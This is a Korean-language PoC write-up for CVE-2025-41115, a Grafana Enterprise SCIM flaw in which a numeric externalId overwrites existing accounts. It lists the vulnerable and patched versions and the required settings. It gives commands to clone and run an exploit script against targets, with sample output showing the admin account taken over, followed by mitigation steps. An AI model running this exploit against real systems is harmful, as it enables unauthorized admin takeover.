
CVE-2025-41115

Grafana Enterprise의 치명적인 SCIM 권한 상승 취약점
CVE-2025-41115는 SCIM 사용자 프로비저닝 기능에 영향을 미치는 Grafana Enterprise의 치명적(CVSS 10.0) 취약점입니다.
SCIM 프로비저닝이 활성화되고 user_sync_enabled = true인 경우, 악의적인 SCIM 클라이언트가 숫자 형식의 externalId 를 보낼 수 있으며, Grafana는 이를 내부 사용자 ID로 잘못 매핑하여 공격자가 관리자를 포함한 기존 계정을 가장하거나 덮어쓸 수 있게 됩니다.
⚠️ Grafana OSS는 영향을 받지 않습니다.
악용에 필요한 조건:
enableSCIM = true[auth.scim] user_sync_enabled = true| 버전 | 상태 |
|---|---|
| 12.0.0 → 12.2.1 | ❌ 취약 |
| 12.3.0 | ✅ 패치됨 |
| 12.2.1 (패치 빌드) | ✅ 패치됨 |
| 12.1.3 | ✅ 패치됨 |
| 12.0.6 | ✅ 패치됨 |
💡 관리형 Grafana 서비스(AWS/Azure/Grafana Cloud) 는 공급업체에 의해 패치되었습니다.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
또는 위 스크립트를 파일에 복사하여 붙여넣기만 하면 됩니다
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
익스플로잇이 실제로 작동하면(즉, 대상이 취약하고 토큰이 유효한 경우) 정확히 다음과 같은 출력이 표시됩니다: text
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
12.3.0 또는 패치된 유지보수 릴리스 중 하나로 업데이트하세요.
SCIM 프로비저닝을 사용하지 않는 경우 다음이 설정되어 있는지 확인하세요:
enableSCIM = false
또는
[auth.scim]
user_sync_enabled = false
다음을 찾아보세요:
externalId 사용신뢰할 수 있는 ID 공급자만 SCIM 엔드포인트와 통신할 수 있도록 하세요.
의심스러운 로그인, 사용자 생성 이벤트, 관리자 계정 탈취를 주시하세요.
이 PoC는 귀하가 소유했거나 명시적인 서면 허가를 받은 시스템에서만 승인된 보안 테스트 및 교육 목적으로 사용해야 합니다. 무단 사용은 불법이며 형사 기소로 이어질 수 있습니다. 작성자와 배포자는 오용에 대한 책임을 지지 않습니다. 즉시 패치하십시오 (≥12.0.6 / 12.3.0+).